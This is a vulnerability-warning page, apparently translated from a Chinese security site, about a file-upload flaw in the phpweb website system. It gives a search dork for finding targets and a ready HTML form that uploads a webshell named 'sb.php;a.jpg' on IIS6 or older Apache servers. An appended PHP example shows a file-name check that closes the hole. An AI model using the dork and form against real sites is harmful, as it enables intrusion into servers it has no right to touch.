phpweb ready-made website system, all versions: injection vulnerability and fix - Vulnerability Warning - Black Bar Safety Net

2012-11-09T00:00:00
ID MYHACK58:62201235469
Type myhack58
Reporter Anonymous
Modified 2012-11-09T00:00:00

Description

Keywords: inurl:webmall/detail.php?id

Data table: pwn_base_admin

On getting a shell

First, log in to the back end, admin.php.

I spent an afternoon analysing the upload.php source code and roughly understood that, although the upload only allows four file types (gif, jpg, png, bmp), it places no restriction on the file name.

In other words, a file named sb.php;a.jpg is also allowed, so as long as the server is IIS6 a webshell can be obtained; on older versions of Apache you can try renaming it to sb.php.jpg.

Only after I had finished did I find that someone here had a leaner version than mine. Damn, hats off to "three stone"; I will just borrow it. At first I did the same as him, which was to take all of the source code, and then I found a more streamlined one:

<form name="uploadForm" method="post" enctype="multipart/form-data" action="http://xxx.com/kedit/upload_cgi/upload.php">

<input type="text" name="fileName" value="sb.php;a.jpg" />

<input type="hidden" name="attachPath" value="news/pics/" />

<input type="file" name="fileData" size="14" />

<input type="submit" name="button" value="OK" />

</form>

First log in to the back end, then save the form above as xx.html and modify the action, then upload; if the server is IIS6, just view the source after uploading.
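
A server-side check that closes the file-name gap described above, as an added example that is not phpweb's code or the original author's fix. It assumes PHP 7.1 or later; the function name safe_upload_name and the sample names are constructed for illustration.

```php
<?php
// Added example (hypothetical hardening, not phpweb's own code): the handler
// described above checks the file type but stores whatever name the client
// sends in "fileName". Here the client name is never used as the stored name.

const ALLOWED_EXT = ['gif', 'jpg', 'png', 'bmp'];

/**
 * Return a server-generated stored name, or null if the upload must be rejected.
 */
function safe_upload_name(string $clientName): ?string
{
    // Reject path separators, NUL bytes and ';' (the character the IIS6 case
    // in the write-up depends on).
    if (preg_match('/[\/\\\\;\x00]/', $clientName)) {
        return null;
    }

    // Require exactly one dot, so a double extension such as "sb.php.jpg"
    // (the older-Apache case in the write-up) is rejected.
    $parts = explode('.', $clientName);
    if (count($parts) !== 2 || $parts[0] === '') {
        return null;
    }

    // The single extension must be on the whitelist, compared case-insensitively.
    $ext = strtolower($parts[1]);
    if (!in_array($ext, ALLOWED_EXT, true)) {
        return null;
    }

    // Random base name plus the whitelisted extension: nothing the client
    // typed survives into the path on disk.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed sample names, including the two from the write-up above.
foreach (['photo.jpg', 'sb.php;a.jpg', 'sb.php.jpg', '../x.png', 'a.PHP'] as $name) {
    $stored = safe_upload_name($name);
    printf("%-14s => %s\n", $name, $stored ?? 'REJECTED');
}
```

Only photo.jpg is accepted, and it is stored under a random name. Serving the upload directory with script execution disabled is a complementary control.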